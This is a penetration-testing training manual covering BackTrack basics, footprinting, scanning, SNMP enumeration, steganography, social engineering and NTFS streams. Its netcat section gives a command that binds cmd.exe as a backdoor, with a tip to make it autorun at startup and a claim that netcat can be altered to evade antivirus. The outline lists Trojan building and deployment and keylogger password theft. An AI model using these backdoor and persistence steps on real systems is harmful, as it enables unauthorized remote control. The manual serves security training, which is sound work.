St. Angelo‘s Professional Education Lab Manual v1114.79.143.8/studentdesk/Download/Cyber Security...

St. Angelo‘s Professional Education Lab Manual v1.0

1

Contributing Authors:

Rajesh Vishwakarma

Vinod Singh

Satish Jha

Lalit Jha


2

Table of Contents

Program Overview ............................................................................................................................ 5

What is penetration testing? ........................................................................................................ 5

Objectives ..................................................................................................................................... 5

Pre-requisites ............................................................................................................................... 5

Course Contents ........................................................................................................................... 6

Module One: Art of Hacking ..................................................................................................... 6

Module Two: Scenario of Enterprise security .......................................................................... 6

Module Three: Planning and gathering Information................................................................ 6

Module Four: Social Engineering .............................................................................................. 6

Module Five: Taking on the system .......................................................................................... 7

Module Six: Attacking passwords ............................................................................................. 7

Module Seven: Malwares, Rootkits and Trojans ...................................................................... 7

Module Eight: Getting Offensive .............................................................................................. 8

Module Nine: Exploiting ........................................................................................................... 8

Module Ten: Report writing & Supporting compliance ........................................................... 9

NSD Penetration Testing Training Schedule ...................................... Error! Bookmark not defined.

Day 1 Schedule .............................................................................. Error! Bookmark not defined.





Group Discussions ...................................................................................................................... 10

Team Activities ........................................................................................................................... 10

Case studies ................................................................................................................................ 10

Assignments ............................................................................................................................... 11

Module One: Art of Hacking ........................................................................................................... 12

Group Discussion - Hacker Culture, Ethics and Rise of Anonymous .......................................... 12

Hacker Culture - Discuss the following questions: ................................................................. 12

Ethics - Discuss the following questions: ................................................................................ 12

Rise of Anonymous ................................................................................................................. 13

Group Discussion: What is a System? .................................................................................... 13

Scenario: ................................................................................................................................. 13

Assignment ............................................................................................................................. 13

Module Two: Scenario of Enterprise Security ................................................................................ 14

Scenario ...................................................................................................................................... 14

Challenges .................................................................................................................................. 14

Group Discussions: ..................................................................................................................... 15


3

Module Three: Planning and Gathering Information ..................................................................... 16

Getting Started With Backtrack: ................................................................................................. 16

Logging into backtrack: ........................................................................................................... 16

Changing default password .................................................................................................... 16

Starting the Graphical User Interface ..................................................................................... 16

Network configuration: .......................................................................................................... 16

Starting various services in Backtrack .................................................................................... 17

Navigating the System ............................................................................................................ 18

Pentest Directory .................................................................................................................... 21

Netcat overview ..................................................................................................................... 21

To Use netcat as a backdoor: ................................................................................................. 22

Exercises: ................................................................................................................................ 22

Foot-printing:.............................................................................................................................. 22

What is DNS: ........................................................................................................................... 23

Zone Transfer: ........................................................................................................................ 23

Dnsenum.pl ............................................................................................................................ 24

Using Dig ................................................................................................................................. 24

Using Whois ............................................................................................................................ 25

Exercises: ................................................................................................................................ 26

Using Maltego: ....................................................................................................................... 26

Scanning: .................................................................................................................................... 28

Tools – IP scanning: ................................................................................................................ 29

Nmap: ..................................................................................................................................... 29

Enumeration: .............................................................................................................................. 30

SNMP Enumeration: ............................................................................................................... 31

Steganography: Hiding Data within Data ....................................................................................... 33

Exercises ................................................................................................................................. 39

Module Four: Social Engineering .................................................................................................... 40

Social Engineering Concepts: ...................................................................................................... 40

Dumpster Diving ......................................................................................................................... 41

Module Five: Taking on the system ................................................................................................ 42

NTFS Alternate Streams: ........................................................................................................ 42

Physical Access Attacks: ......................................................................................................... 43

Reset Linux Passwords: .......................................................................................................... 43

Reset Windows Passwords: .................................................................................................... 44

Using chntpw .......................................................................................................................... 44

TCPDUMP (Network Analyzers) .............................................................................................. 46

Wireshark .............................................................................................................................. 49


4

Arp Spoofing (Ettercap) ....................................................................................................... 52

Module Six: Attacking passwords .............................................................................................. 55

HYDRA: Brute Force tool ..................................................................................................... 55

Using Lophtcarck to crack the hashes: .............................................................................. 56

Module Seven: Malwares, Rootkits and Trojans ...................................................................... 58

Objectives: ............................................................................................................................. 58

Beast....................................................................................................................................... 59

Trojan ..................................................................................................................................... 59

Building a Trojan using Beast ............................................................................................. 59

Batch File Viruses.................................................................................................................. 67

theHarvester.py .............................................................................................................................. 70

Exercises ................................................................................................................................. 72

Module Eight: Getting Offensive ................................................................................................ 73

Common Web Application Attacks ....................................................................................... 73

Objective ............................................................................................................................... 73

Tools....................................................................................................................................... 73

Netcraft .................................................................................................................................. 73

Configuring WebGoat ......................................................................................................... 74

SQL Injection ......................................................................................................................... 75

Using Tamperdata ................................................................................................................ 76

Havij ....................................................................................................................................... 79

Cross Site Scripting .............................................................................................................. 82

Basic Authentication Flaws .................................................................................................. 84

Google Dorks ........................................................................................................................ 87

Module Nine: Exploiting .............................................................................................................. 88

Buffer Overflows: .................................................................................................................. 88

Using Ollydbg ....................................................................................................................... 91

Writing Shellcode: ................................................................................................................ 98

Metasploit: .......................................................................................................................... 101

Exercises:.............................................................................................................................. 105

Proxies and Tunneling Techniques ............................................................................................... 107

Proxies ...................................................................................................................................... 107

Pivoting (SSH tunneling) ....................................................................................................... 110

Exercises: .............................................................................................................................. 110


5

Program Overview

What is penetration testing?

A penetration test, occasionally pentest, is a method of evaluating the security of a computer system

or network by simulating an attack from malicious outsiders (who do not have an authorized means of

accessing the organization‘s systems) and malicious insiders (who have some level of authorized

access).

The process involves an active analysis of the system for any potential vulnerabilities that could result

from poor or improper system configuration, both known and unknown hardware or software flaws,

and operational weaknesses in process or technical countermeasures. This analysis is carried out from

the position of a potential attacker and can involve active exploitation of security vulnerabilities.

Security issues uncovered through the penetration test are presented to the system‘s owner. Effective

penetration tests will couple this information with an accurate assessment of the potential impacts to

the organization and outline a range of technical and procedural countermeasures to reduce risks.

Objectives

At the end of the training, following objectives will be achieved:

Design and create attack plan methodologies

Understand social engineering aspects used for attacks

Get an insight into enterprise security trend

Use latest techniques to hack into systems and networks

Conduct regular audits and penetration test in your company

Support legal team with Digital forensic evidence

Support compliance roadmaps based on standards for your organization

Support Internal Audit teams for IT security compliance

Pre-requisites

Background in A+ or MCSE recommended

Good documentation and presentation skills

A strong attitude and proactive approach for self-learning


6

Course Contents

Module One: Art of Hacking

History of hacking

Group Discussion: Hacker Culture, Ethics and Rise of Anonymous

The need of hacking

Group Discussion: What is a system?

Assignment: What is People, Process and Technology and how does it impact security?

Knowing your enemy

Module Two: Scenario of Enterprise security

Team Activity: Is IT security a cost center?

Technology Vs Management

Case study: Security budget across different verticals

Team Activity: Requesting new server in DC

Case study: Insider trading

Making the enterprise: Business Applications

Group Discussion: Why is it always possible to hack?

Module Three: Planning and gathering Information

Making the Plan

Information gathering approaches

Basics: Using BackTrack

Footprinting

Scanning

Enumeration

Group Discussion: What is your approach to gather information?

Team Activity: Gathering information about an organization

Identifying weakness

Module Four: Social Engineering

Introduction to Social Engineering

Assignment: Watch movies on “hacking”

Why people are the weakest link in security

Assignment: What is Body language?

Using Social Networking for effectively gaining trust

Scripting in daily life


7

Assignment: Read the book “Games people play”

Introduction to Reality Hacking

Group Discussion: Do you believe in Astrology?

Case study: Using Black magic and Occult science to hack!

Assignment: Influence a friend to wear specific clothes on a day by exploiting his/her belief

Team Activity: Using social engineering in daily life

Module Five: Taking on the system

Group Discussion: Windows vs Linux vs Mac

Introduction to systems

Assignment: Active Directory Fundamentals

Hiding Data – NTFS streaming

Gaining root access

Privilege Escalation

Man in the Middle attacks

Finding Vulnerabilities

Module Six: Attacking passwords

Password Hacking

Attacking Windows & Linux Passwords

Attacking application passwords

Group Discussion: Do you use the same passwords everywhere?

Case study: Most common passwords used

Using Brute Force Tools

Steganalysis concepts

Using Rainbow Tables

Team activity: Using online hash crackers

Default Passwords of devices

Case study: Impact of default passwords on security

Using Key loggers for stealing passwords

Team activity: Password recovery tools

Module Seven: Malwares, Rootkits and Trojans

Group Discussion: How would you define a malware?

Introduction to malwares

Team activity: List the features will you look in a malware if you have to use it

Building a Trojan


8

Binding a Trojan to another file

Approaches for deploying a Trojan

Case study: Targeting Victims by fake games and movies

Target Harvesting

Rootkits and Botnets

Case study:How botnets work?

Team activity: Find most popular malwares impacting the mobile platforms.

Module Eight: Getting Offensive

Using data from Information gathering activity for attacks

Attacking web applications

Team Activity: Setting up WordPress on localhost

Group discussion: what mistakes can affect web application security?

Web server Security

Top 10 threats to Web Applications

Basic Authentication Attacks

SQL Injection & Cross site scripting

LFI / RFI

Advanced Google search techniques

Group discussion: DoS attacks impacting organizations

Sniffing networks

Module Nine: Exploiting

Memory concepts and File Format for executables

Quick Assembly introduction

Stack over flows from scratch

Introduction to Debuggers like IDA/Ollydbg

Introduction to Shellcodes

Introduction to Exploit Writing

Using exploit-db effectively

Creating a sample exploit

Metasploit – The Big Daddy

Introduction to msfencode/msfpayload

Manual Shellcode Writing and Automatic Shellcode Generation

Introduction to Fuzzing and Fuzzing framework

Client Side Exploitation Techniques

Concept of tunneling and techniques


9

Evading Firewalls by hopping through the tunnels using proxy servers

smb fun – windows and linux

The art of exploit writing ( Windows and Linux)

Different type of exploits including off by one , race conditions

Anti Virus Evasion

Setting up a lab

Module Ten: Report writing & Supporting compliance

Building professional reports – basics

Team activity: Create a VA report

Introduction to ISO 27001

Discussion: Security as a continuous process

Introduction to SIEM technologies

Group Discussion: Impact of Log Analysis & co-relation

Importance of Audits

Team Activity: Communicating with management

Team Activity: Forming a steering committee

Group discussion: What will you expect from VA reports as a CISO?

Group discussion: Importance of training

Group discussion: Patch Management

Assignment: What is Asset management?

Best practices & Case study


10

Group Discussions

Group Discussions

01 Hacker Culture, Ethics and Rise of Anonymous

02 What is a system?

03 Why is it always possible to hack?

04 What is your approach to gather information?

05 Do you believe in Astrology?

06 Windows vs Linux vs Mac

07 Do you use the same passwords everywhere?

08 How would you define a malware?

09 What mistakes can affect web application security?

10 DoS attacks impacting organizations

11 Security as a continuous process

12 Impact of Log Analysis & co-relation

13 What will you expect from VA reports as a CISO?

14 Importance of training

15 Patch Management

Team Activities

Team Activities

01 Is IT security a cost center?

02 Requesting new server in DC

03 Gathering information about an organization

04 Using social engineering in daily life

05 Using online hash crackers

06 Password recovery tools

07 List the features will you look in a malware if you have to use it

08 Find most popular malwares impacting the mobile platforms.

09 Setting up WordPress on localhost

10 Create a VA report

11 Communicating with management

12 Forming a steering committee

Case studies

Case Studies

01 Security budget across different verticals


11

02 Insider trading

03 Using Black magic and Occult science to hack!

04 Most common passwords used

05 Impact of default passwords on security

06 Targeting Victims by fake games and movies

07 How botnets work?

Assignments

Assignments

01 What is People, Process and Technology and how does it impact security?

02 Watch movies on ―hacking‖

03 What is Body language?

04 Read the book ―Games people play‖

05 Influence a friend to wear specific clothes on a day by exploiting his/her belief

06 Active Directory Fundamentals

07 What is Asset management?


12



India is known for its capability in Information Technology. But, it is also a fact that India is one of the

top countries with highest rate of Cybercrimeincidents and Computer Virus infections. This not only

affects a lot of individuals, but also the business and the Government, who are regular targets of

coordinated hacking attacks.

But what is the History of Hacking? How did it all start?

Your Instructor will walk you through the amazing history!

Meanwhile, visit these links!

http://en.wikipedia.org/wiki/Timeline_of_computer_security_hacker_history

http://freehacking.org/hackerhistory/

Group Discussion - Hacker Culture, Ethics and Rise of Anonymous

Hacker Culture - Discuss the following questions:

1. What do you think is Hacker Culture? Who defines it?

2. What is the description of a hacker?

3. What kind of perception do general people have on Hackers?

4. What do you think are the trends in hacker culture over the last 5 years?

5. List down at least 5 significant aspects that you feel define the cult and culture of hackers.

6. Discuss about Aaron Swartz - what do you think about the case and fairness of law related to

hacking?

7. Submit a one page write-up (300 words or more) on your view of Aaron Swartz case, hacker

culture and its importance to your Instructor.

Ethics - Discuss the following questions:

1. What are ethics? Do you feel Hackers have ethics as part of their hacker culture?

2. How are ethics different from code of conduct?

3. How do ethics play in a role in defining a White Hat, Black Hat or Grey Hat Hacker?

4. What do you think is the most important ethic that needs to be followed by Hackers?

5. If you find a vulnerability in a company website while surfing the Internet, what action will you

take and how will your action be ethical?

6. What do you think of Wikileaks? How ethical do you think is the concept of Wikileaks and

what are its impact?

7. Submit a one page write-up (300 words or more) on your view of Wikileaks and Computer

Ethics to your Instructor.

http://en.wikipedia.org/wiki/Timeline_of_computer_security_hacker_history

http://freehacking.org/hackerhistory/


13

Rise of Anonymous

1. What do you think is Anonymous all about?

2. Do you think the actions of Anonymous is ethical?

3. What do you think is the impact of Anonymous on freedom of Internet?

4. What are the legal risks of starting such groups and getting caught?

5. Does the society derive any benefit or is there a larger good from actions of such groups?

6. Submit a one page write-up (300 words or more) on role of Hacker groups, Hactivism and its

potential impact on Internet.

Group Discussion: What is a System?

1. What are the components of a system? List down the components you can think of and give it

to your Instructor.

2. What is the definition of a system? Is it a computer? A mouse? A CPU? A process?

3. What are networks? What makes up a network?

4. List some devices required to create a network and try explaining their generic working.

5. What is a Client / Server Model?

6. What are web applications? what are the components of the a web application?

7. When you open a web-page, what all actions happen behind the scenes to deliver the content

to you?

Scenario:

You need to send a letter across one building to another, but the road is filled with Terrorists..they will

shoot you if you step outside.. what kind of approach will you take to deliver this and why?

Assignment

What is People, Process and Technology and how does it impact security?

Submit your assignment in a word document in approximate 300 words or more to your Instructor.


14

Module Two: Scenario of Enterprise security

Module Two: Scenario of Enterprise Security

In this activity, you are going to try and understand real life challenges in running organizations vs

priority of security.

Scenario

Background - First Company

You are working for ACME SOFT - a start-up software development with a budget of INR Ten Lacs for

one year. The company has 7 employees as follows:

Employee 1: Founder / Managing Director – responsible for finances

Employee 2: Project Manager / Developer – responsible for project completion

Employee 3: IT Manager – responsible for IT infra and Security

Employee 4,5,6,7 - Developers

ACME SOFT has developed a software product that costs Rs.25000 per licensing. The company is

planning to hire more employees for expanding their operations and developing new product that will

take 6 months to create.

Background - Second Company

You are working for ACME SECURE - a start-up security consulting company with a capital of INR Ten

Lacs. The company has 6 employees as follows:

Employee 1: Founder / Managing Director – responsible for finances

Employee 2: Project Manager / Pre-sales Manager – responsible for Sales & business

Employee 3: Security Engineer – responsible to support after sales, deploy product etc

Employee 4,5,6 - Junior Staff

ACME SECURE have developed a security product that costs Rs.9000 to make for each software

license. It can make software more secure from hacking and is very useful for software development

companies.

Challenges

Task One: The Group leader from each company must allocate budget for:

Salary for employees

Budget for IT Infrastructure


15

Budget for Marketing

Budget for running company / taxes

Task Two: ACME SECURE has to give a demonstration to ACME SOFT about their product and sell it.

Group Discussions:

1. How will ACME SECURE sell this product? What are the challenges?

2. Who needs to be convinced in ACME SOFT to buy the product?

3. How will ACME SOFT manage and plan the budget for new employees for 6 months with a

given capital? Will this be impacted if they plan to buy the security product from ACME

SECURE?

4. Why will ACME SOFT require the security product?

5. What are the risks of ACME SOFT not buying the security product?

6. What are the financial risks if ACME SOFT buys the security product? Is it a priority?

7. How will ACME SECURE sustain itself if ACME SOFT does not buy it?

8. Do you think ACME SOFT IT Manager can do his job properly if he does not get the required

hardware and software for security of the company products and data?

9. Do you think ACME SOFT MD will care about security if he does not make enough revenue to

run the company and pay employees on time?

10. Do you think security is a cost center? Why?


16

Module Three: Planning and gathering Information

Module Three: Planning and Gathering Information

Getting Started With Backtrack:

Objectives: At the end of this module you should be able

To work with backtrack Linux OS.

To use various Linux commands.

To be able to locate tools, software and scripts used in penetration testing.

Logging into backtrack:

Once you boot into backtrack, you can login with the below information:

The default user name is: root

The default password is: toor

Changing default password

You can change the password using the command:

root@bt:~# passwd

Starting the Graphical User Interface

In order to get into a GUI interface you‘ll have to execute the following command:

root@bt:~# startx

Network configuration:

Setting up IP manually: We can set IP address using the GUI interface but it‘sbetter once you are

familiar with the command line.

First off check for available Ethernet devices, for that execute the command


17

root@bt:~# ifconfig

In order to make the following changes:

IP Address - 192.168.1.11

Default Gateway - 192.168.1.1

DNS server - 192.168.1.1

We will have to execute the following commands (Where eth0 is the network interface name)

Step 1:

root@bt:~# ifconfig eth0 192.168.1.11

Step 2:

root@bt:~# route add default gw 192.168.1.1

Step 3:

root@bt:~# echo nameserver 192.168.1.1 >

/etc/resolv.conf

In order to enable the device the following command:

root@bt:~# ifup eth0

root@bt:~# ifup eth0 (to disable)

Starting various services in Backtrack

Backtrack has various services such as Apache, SSH, MySQL, VNC, etc.

To start a service such as SSH, you can use the service init scripts.


18

Starting SSH:

Step 1: Generating SSH key

root@bt:~# sshd-generate

Step 2: Starting SSH service

root@bt:~# /etc/init.d/ssh start

To stop service

root@bt:~# /etc/init.d/ssh stop

Apache:

Starting Apache

root@bt:~# /etc/init.d/apache2 start

Stopping Apache

root@bt:~# /etc/init.d/apache2 stop

Navigating the System

When you first login, your current working directory is your home directory.

To find out what is in your home directory, type

root@bt:~# ls


19

The ls command (lowercase L and lowercase S) lists the contents of your current working directory.

CD command: used to change the working directory , to change the working directory type.

root@bt:~# cd

mkdir (make directory )

The command is used to make a new directory, to make a new directory type:

root@bt:~# mkdir (directory name)

cp (copy)

The command is used to copy files, syntax is:


20

root@bt:~# cp SOURCE DEST

cat (concat)

The cat is one of the most frequently usedcommands . It has three related functions with regard to

text files: displaying them, combining copies of them and creating new ones.

locate

The locate command is often the simplest and quickest way to find the locations of files and

directories.

The basic syntax for locate is:

locate [options] name(s)

Example of the command:

http://www.linfo.org/command.html


21

Pentest Directory

Most of the tools are located either in the path or in the /pentest directory. The toolsin the /pentest

directory are categorized and subcategorized as different attack vectors andtools.

Some of the important directories are

./backdoors :This folder contains various backdoor‘s which can be used to maintain accessin a

target system.

./exploits :This folder contains various exploits for windows, Linux etc.written in various languages

like Perl, pythonetc., which can be used to hack into a system.

./passwords :This folder contains password cracking tools

Netcat overview

Netcat also called ―The swiss army knife‖ is a utility used to write data across TCP and UDP networks.

Using netcat an attacker can place backdoor that will allow him/her to telnet DOS shell.


22

In fact netcat can be used as port scanner, banner grabbing tool, Trojan and backdoor. The power of

netcat can be calculated from the fact that it can act as both server and client and even doesn't get

detected by Anti-Virus and even if it gets detected its source code is available add some unnecessary

code that will change its signature thus allowing it by bypass Anti-Virus. This tutorial is aimed at

complete beginner to netcat.

We can also use netcat as banner grabbing tool that means it can grab application version.

C:\>nc -v -n 10.42.43.12 80

v - tells keep output in verbose mode

n - do not resolve DNS, keep all addresses numerical

To Use netcat as a backdoor:

First, get the netcat executable file (nc.exe) onto the target's c:\windows\system32 directory. Then

make a batch file with the following command in it:

nc -L -d -p <port No> -t -e cmd.exe

Tip: One trick is to make this batch file be aautorun/startup script, thus whenever the system starts

the script will run automatically.There are lots of other tricks that can be used. Just find your way.Once

that batch file is run, you can telnet or use netcat in client mode to connect to it.

Here's how to use netcat to connect to it:

In a command prompt, give the command

C:\WINDOWS\>nc -v <IP Address ><port No>

Once you connected to that port on the victim‘s computer, you'll have a Command prompt that you

can give any command on the victim‘s computer.

Exercises:

Use the locate command to locate ―theHarvester” tool

Use the ‗find‘ command to find the ―.lst” files in backtrack.

Name at least five tools in each directories of pentest.

Create a text file using cat and use cat to display it on screen.

Foot-printing:



23

To learn techniques used to gather information on a target computer system.

To effectively use DNS and Network information gathering tools.

To gather public information from various search engines and websites.

To profile a target organization/network effectively.

What is DNS:

The domain name system (DNS) is the way that Internet domain names are located and translated into

Internet Protocol addresses. A domain name is a meaningful and easy-to-remember "handle" for an

Internet address.

DNS servers do hold a lot of information about a domain‘s IP addresses which are essential in

attacking a system. Having the knowledge about all the IP addresses of a particular domain increases

the success rate of an attack.

Zone Transfer:

A Zone Transfer is the term used to refer to the process by which the contents of a DNS Zone file are

copied from a primary DNS server to a secondary DNS server.

A zone transfer takes place

When starting the DNS Service on the secondary DNS server.

When the refresh time expires.

When changes are saved to the Primary Zone file and there is a Notify List.

A zone transfer should take place from a primary DNS server to Secondary DNS server where the

secondary DNS server is a registered DNS server.

But in certain cases where the primary DNS server fails to check the authenticity of the secondary

server, it can transfer the zone to any system that requests for a zone transfer.

A zone transfer can be performed by any of the following tools. There are also automated scripts in

our backtrack OS which extend and ease out the process of performing a zone transfer.

o Dig

o Host

o Dnsenum.pl <Backtrack Tool>

o Fierce.pl <Backtrack Tool>

The following snippet shows how a zone is transferred from primary to secondary DNS server


24

Dnsenum.pl

This tool automatically finds out information about DNS, including name servers, mail servers and

zone transfers.

The tool is located at /pentest/enumeration/dns/dnsenum/

#dnsenum<domain>

Using Dig

Domain Information Groper (dig) is a network administration command-line tool for querying Domain

Name System (DNS) name servers for any desired DNS records.

Dig is useful for network troubleshooting and for educational purposes. Dig can operate in interactive

command line mode or in batch mode by reading requests from an operating system file.

When a specific name server is not specified in the command invocation, it will use the operating

systems default resolver, usually configured via the <resolv.conf> file. Without any arguments it

queries the DNS root zone.

#: dig<example.com>

Example of Dig command


25

To perform a zone transfer use the following command

#dig www.example.com <nameserver> AXFR

Host: <example> : host <example.com>

Host command returns the Internet address of a host machine when the <HostName> parameter is

specified and the name of the host when the Address parameter is specified.

Depending on the configuration of name resolution service, the host command may also display any

aliases associated with the <HostName> parameter.

Host command can also be used to perform a zone transfer by using ―-l‖ as an option

Host -l <domain name><nameserver>

Using Whois

Whois is a query and response protocol that is widely used for querying databases that store the

registered users or assignees of an Internet resource, such as a domain name, an IP address block, or

an autonomous system, but is also used for a wider range of other information. The protocol stores

and delivers database content in a human-readable format.

The following image shows the details poured out by whois command.

WHOIS: <example>: whois<example.com>


26

Apart from having these tools we can use other online tools available from the following sites

http://remote.12dt.com/

www.yougetsignal.com

www.domainresearchtool.com

www.netcraft.com

www.domaintools.com

www.who.is

www.hackersforcharity.org

http://www.exploit-db.com/google-dorks/

Exercises:

Use the following tools and explain the functioning with an example:

○ Ping

○ Traceroute

○ NSLookup

○ Netcraft

Using Maltego:

http://remote.12dt.com/

http://www.yougetsignal.com/

http://www.domainresearchtool.com/

http://www.netcraft.com/

http://www.domaintools.com/

http://www.who.is/

http://www.hackersforcharity.org/

http://www.exploit-db.com/google-dorks/


27

Maltego is an information gathering tool that allows you to visually see relationships. Maltego allows

you to enumerate network and domain information like:

Domain Names

Whois Information

DNS Names

Netblocks

IP Addresses

Maltego also allows you to enumerate People information like:

Email addresses associated with a person's name

Web sites associated with a person's name

Phone numbers associated with a person's name

Social groups associated with a person's name

Companies and organizations associated with a person's name

Maltego also allows you to:

Do simple verification of email addresses

Search blogs for tags and phrases Identify incoming links for websites

Extract metadata from files from target domains

Maltego can be used for the information gathering phase of all security related work. It will save you

time and will allow you to work more accurately and smarter. Maltego aids you in your thinking

process by visually demonstrating interconnected links between searched items.

Maltego provide you with a much more powerful search, giving you smarter results. If access to

"hidden" information determines your success, Maltego can help you discover it.

Maltego supports 4 types of layout algorithms:

Block layout. This is the default layout and is also used during mining. This layout is

discussed in more depth later.

Hierarchical layout. Think of this a tree based layout â€― like a file manager.

Centrality layout. Nodes that are most central to the graph (e.g. most incoming links) appear

in the middle with the other nodes scattered around it.

Organic layout. Nodes are packed tight together in such a way that the distance between

each node and all the other nodes are minimized.

We can start by taking a name, and use Maltego to enumerate possible email addresses. The first

thing we have to do is input our search terms. First Name: XYZ, Surname: ZYX. You can also use

additional search terms like Country Code and Additional Search Term.


28

The result is neat graph showing us the relationship of the entity to other different entities and their

information.

Exercises:

Students are recommended to work on Maltego from your Backtrack OS and perform

transformations on atleast three different entities.

Document every finding on each entity performed.

Warning:Students should not go for all transformations at once as it consumes a lot of bandwidth.

You should not create any trouble to the owner of the entity!

Scanning:

Port scanning is one of the most common reconnaissance techniques used by testers to discover the

vulnerabilities in the services listening at well-known ports.


29

Once you've identified the IP address of a target system through footprinting, you can begin the

process of port scanning: looking for holes in the system through which you -- or a malicious intruder

-- can gain access.

A typical system has 2^16 -1 port numbers, each with its own TCP and UDP port that can be used to

gain access if unprotected.

Three phases are included in scanning

1. IP scanning.

2. Port scanning.

3. Vulnerability scanning.

IP scanning: Scanning for live systems

Examples:

○ Angry IP scanner

○ Unicornscan

○ Advanced IP scanner

Port scanning: Scanning the systems for open ports

Examples:

○ Nmap

○ Autoscan

○ Netifera

Vulnerability scanning: Scanning the system for any vulnerability in the services.

Examples:

○ Nessus

○ Core Impact

○ Acunetix

Tools – IP scanning:

Angry Ip Scanner:

Nmap:

The best in the market for Port scanning, Nmap gives us Information about the services running on a

specific port, operating system details, NetBIOS Information, Shared Folders and lots more.


30

Steps to use the program:

Open Zenmap (Graphical User Interface for Nmap).

Provide the Target IP or Range.

Select the Profile to scan.

Click on Scan to start the scan.

You can also provide any extra options to the current scan in the Command Box.

Results can be viewed in the Nmap Output Pane.

Nmap - Interesting options

● -f fragments packets

● D Launches decoy scans for concealment

● -I IDENT Scan – finds owners of processes (on Unix systems)

● -b FTP Bounce

Port Scan Types

● TCP Connect scan

● TCP SYN scan

● TCP FIN scan

● TCP Xmas Tree scan (FIN, URG, and PUSH)

● TCP Null scan

● TCP ACK scan

● UDP scan

Enumeration:

Objectives: At the end of this module you should be able to


31

Enumerate systems on the network.

Effectively use SNMP protocol to gather information of systems and network.

Description:

Enumeration is making an ordered list of items, here we try to enumerate devices/nodes in a network,

which makes the latter penetration part easier.

SNMP Enumeration:

SNMP is based on UDP, a stateless protocol, and is therefore susceptible to IP spoofing. In addition,

SNMP has a weak authentication system for both private and public community strings. These

community strings are passed unencrypted on the network and are often left in their default state -

―private‖ and ―public.‖

Examining information from a Windows host running SNMP can be done by using the following

command:

snmpwalk -c public -v1 <ip address> 1

To view the system info we can use the following arguments to snmpwalk

root@bt:~# snmpwalk -c public -v1 192.168.0.110

SNMPv2-MIB::sysDescr.0

SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 15 Model 4 Stepping 8

AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor

Free)

Enumerating Windows Users:

BT-ARKZ # snmpwalk -c public -v1 192.168.0.110 1.3 |grep 77.1.2.25 |cut -d" " -f4

"Guest"

"Administrator"

"IUSR_WIN2KSP4"

"IWAM_WIN2KSP4"

"TsInternetUser"

"NetShowServices"

Enumerating Windows Services:


32

BT-ARKZ # snmpwalk -c public -v1 192.168.0.110

|grephrSWRunName|cut -d " " -f4

"System‖

"System"

"smss.exe"

"csrss.exe"

"snmp.exe"

Enumerating TCP ports:

BT-ARKZ # snmpwalk -c public -v1 192.168.0.110 1

|greptcpConnState |cut -d"." -f6 |sort –nu

21

25

80

Having seen some examples above there are lots of other interesting arguments or commands that

can be given to snmpwalk to enumerate many more things. But when we have backtrack we need

worry about remembering all that stuff.

You can use snmpenum.pl and snmpcheck.pl to enumerate all available info.


33

Steganography: Hiding Data within Data


Understand Steganography to hide data under images. Comfortably use tools like Image Hide, Invisible Secrets etc.

Description:

Steganography is the technique of writing hidden information within images, audio or video. The wordsteganography is of Greek origin and means "concealed writing". These technique is used by hackers, terrorists etc. to communicate with each other without beingcaught. And the technique makes sure that the data is well hidden. There are many techniques used, but the most famous or commonly used technique is hiding data in aimage file. We will be seeing how it actually done.

We will be using software known as Invisible Secret 2.1

PART 1 (HIDING DATA)

Step 1: Install the software and run it

Step 2: Click on next.

Step 3:


34

Select the option as shown above and click on next

Step 4:

Select the image in which you want to hide data, Above I have selected a image original.jpg. Then click on next.

Step 5:


35

Click on add files and here select the file which you want to hide in the picture, As you can see above I have selected a text file “This is secret.txt”. You can select multiple files also. After selecting, click next.

Step 6:

You will have to provide a encryption password, then click next.


36

Step 7:

Now give the target file a name, this file will contain your hidden text. As you can see above I have named it “stenoimage”. Now click on next

Step 8:

As you can see a new image file has been created with the name “stenoimage”. Its same as the original file with no changes or is it?

Click on next and then on the next window click finish.


37

Till here we have managed to hide a text file in image. Now on the next part we will extract the hidden data.

EXTRACTING HIDDEN DATA FROM THE IMAGE

Step 1:

Well after clicking on finish you will end up on this screen.

This time select the 2nd option to extract the secret data from the image. Click on next.


38

Step 2:

Select the image from which you want to extract the hidden file in our case it is “stenoimage.jpg”, then click on next.

Step 4: Input the password that you provided earlier.

As you can see above that’s our secret file, now chose the location where u want to extract it and click on next. And your secret file will be visible.


39

Exercises

i. Try to extract text from a picture without using steganography tools.


40



Social Engineering is generally a hacker‘s clever manipulation of the natural human tendency to trust

Objectives:

• Social engineering concepts

• Categories of social engineering

• Techniques for social engineering

• Approach

• Scenarios

• Best practices

• Summary

Social Engineering Concepts:

Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on

human interaction, tricking people to break normal security procedures.Social engineering is generally

a hacker‘s clever manipulation of the natural human tendency to trust.The hacker‘s goal is to obtain

information that will allow him/her to gain unauthorized access to a valued system and the

information that resides on that system.

Social Engineering Categories:

• Human based social engineering

– Telephonic

– Persuasion

– Dumpster diving

– Shoulder surfing

• Technology based social engineering

– Phishing

– Misleading programs

– Spoofed mails/Spam

Human Based Social Engineering

Social engineering on human level is generally exploited on basis of trust and face to face

interaction.Social engineering at psychological level can take place at multiple levels:

Gaining sympathy

Playing games (I am ok You are ok)

Manipulating thoughts

Giving an impression


41

Calculated inducement of feelings over time

Exploiting factors like above to reach an objective.

Using Technology for Social Engineering

Hackers use a variety of techniques to social engineer using technology

Masquerading as a customer in a support chat for assistance

Sending fake e-mails containing bogus product queries

Sending links to fake websites

Phishing common websites of interest

Creating fake blogs with misleading news/information

Creating fake profiles in social networking sites like orkut.

Cheating people by pretending to be helpless girl on chat and asking for money (cyber-

begging).

Pretend to be a customer support engineer.

Social Engineering by Phone

The most prevalent type of social engineering attack is conducted by phone.

Help desks are particularly prone to this type of attack.

Hackers are able to pretend they are calling from inside the corporation by playing tricks on

the PBX or the company operator.

Help desks are particularly vulnerable because they are in place specifically to help.

Dumpster Diving

Dumpster diving, also known as trashing, is another popular method of social engineering.

A huge amount of information can be collected through company dumpsters.

The information can be company phone books, organizational charts, company policy

manuals, events and vacations, system manuals, printouts of sensitive data or login names

and passwords, printouts of source code, disks and tapes, company letterhead and outdated

hardware.


42



NTFS Alternate Streams:


To create and read alternate data stream.

To hide different files using the ADS technique.

Description:

NTFS stream or Alternate Data Stream is a feature only available in the NT File system. Using this

feature any file of desired length can be hidden under another file, such that the true properties of

hidden file are never shown to the user.

Unlike the Hide attribute available form the properties tab of a file, the ADS can be used to completely

hide the file from the file system.

Streams are not limited in size and there can be more than one stream linked to a file.

Creating a NTFS stream:

To retrieve the hidden file contents:

Hidden.txt file is not visible


43

The alternate data streams can further be used in creating malware which may use a simple bash

